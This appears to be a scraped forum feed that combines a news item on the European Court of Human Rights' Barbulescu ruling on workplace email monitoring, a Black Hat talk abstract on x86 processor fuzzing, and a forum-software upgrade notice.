Finally, European companies must inform employees in advance if their work email accounts are being monitored. The European Court of Human Rights (ECHR) on Tuesday gave a landmark judgement concerning privacy in the workplace by overturning an earlier ruling that gave employers the right to spy on workplace communications. The new ruling came in judging the case of Romanian engineer Bogdan Barbulescu, who was fired ten years ago for sending messages to his fianceé and brother using his workplace Yahoo Messenger account. Earlier Romanian courts had rejected Barbulescu’s complaint that his employer had violated his right to correspondence—including in January last year when it was ruled that it was not "unreasonable for an employer to want to verify that the employees are completing their professional tasks during working hours." But now, the European court ruled by an 11-6 majority that Romanian judges failed to protect Barbulescu’s right to private life and correspondence, as set out in article 8 of the European Convention on Human Rights. Apparently, Barbulescu's employer had infringed his right to privacy by not informing him in advance that the company was monitoring his account and communications. His employer used surveillance software in order to monitor his computer activities. The ruling will now become law in 47 countries that have ratified the European Convention on Human Rights. In a Q & A section on its website, the European Court of Human Rights says the judgement doesn't mean that companies can't now monitor their employee’s communications at workplace and that they can still dismiss employees for private use. However, the ECHR says that the employers must inform their staff in advance if their communications are being monitored, and that the monitoring must be carried out for legitimate purposes and limited. Via thehackernews.com1 point
-
Black Hat Publicat pe 31 aug. 2017 A processor is not a trusted black box for running code; on the contrary, modern x86 chips are packed full of secret instructions and hardware bugs. In this talk, we'll demonstrate how page fault analysis and some creative processor fuzzing can be used to exhaustively search the x86 instruction set and uncover the secrets buried in your chipset. Full Abstract:https://www.blackhat.com/us-17/briefi... Download PDF: https://www.blackhat.com/docs/us-17/thursday/us-17-Domas-Breaking-The-x86-Instruction-Set-wp.pdf1 point
-
1 point
-
Before performing any upgrade please remember to backup your forum’s files and database and store them safely. If you have edited core files, including language files, please make sure you make a changelog for these changes so you can make them again (if necessary) once the upgrade is complete. To upgrade, follow the Upgrading process. The upgrade script is required. There are changes to 9 language files and 9 templates were changed or added.-1 points
-
-1 points